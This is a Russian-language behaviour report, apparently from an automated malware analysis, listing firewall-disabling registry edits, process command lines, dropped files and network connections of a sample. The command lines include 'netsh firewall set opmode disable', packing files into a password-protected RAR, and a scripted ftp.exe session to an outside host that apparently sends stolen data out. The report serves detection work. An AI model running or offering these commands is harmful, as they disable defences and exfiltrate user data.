Техническая информация
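Изменения в реестре (оба значения относятся к стандартному профилю брандмауэра Windows: 'EnableFirewall' = 0 отключает брандмауэр, 'DoNotAllowExceptions' = 0 разрешает исключения):
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'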
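Командные строки процессов (среди них — отключение брандмауэра через netsh и запуск ftp.exe с ключами -n и -s:ftpcmd.dat, то есть неинтерактивный FTP-сеанс по сценарию из файла; такие командные строки пригодны как признаки для обнаружения):
- %TEMP%\1.tmp\web.bin /stext .dll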
- %TEMP%\1.tmp\add.exe c -zinfo 12_40_49 -k a 12_40_49.rar *.dll -psafahi@ x 1.exe *.bin -phicham@
- <SYSTEM32>\ftp.exe -n -s:ftpcmd.dat box12.host1free.com
- <SYSTEM32>\rundll32.exe <SYSTEM32>\shell32.dll,OpenAs_RunDLL c:\HBEDV.KEY
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\Call.bat" "
- <SYSTEM32>\netsh.exe firewall set opmode disable
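Файлы в каталоге %TEMP%\1.tmp (ниже часть путей повторяется вторым списком; по-видимому, подзаголовки, различавшие эти списки, на странице не сохранились):
- %TEMP%\1.tmp\.dll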
- %TEMP%\1.tmp\web.bin
- %TEMP%\1.tmp\HBEDV.KEY
- %TEMP%\1.tmp\12_40_49.rar
- %TEMP%\1.tmp\ftpcmd.dat
- %TEMP%\1.tmp\__rar_00.312
- %TEMP%\1.tmp\info
- %TEMP%\1.tmp\1.exe
- %TEMP%\1.tmp\1.bat
- %TEMP%\1.tmp\Call.bat
- %TEMP%\1.tmp\2.bat
- %TEMP%\1.tmp\Hicham.txt
- %TEMP%\1.tmp\cc.bat
- %TEMP%\1.tmp\add.exe
- %TEMP%\1.tmp\add.exe
- %TEMP%\1.tmp\1.exe
- %TEMP%\1.tmp\cc.bat
- %TEMP%\1.tmp\info
- %TEMP%\1.tmp\12_40_49.rar
- %TEMP%\1.tmp\web.bin
- %TEMP%\1.tmp\ftpcmd.dat
- %TEMP%\1.tmp\.dll
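Сетевая активность (соединения и DNS-запрос; имя узла в этой части частично замаскировано символами #):
- 'localhost':1038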
- 'bo###.host1free.com':21
- DNS ASK bo###.host1free.com
- '<IP-адрес в локальной сети>':1036
- ClassName: 'Shell_TrayWnd' WindowName: ''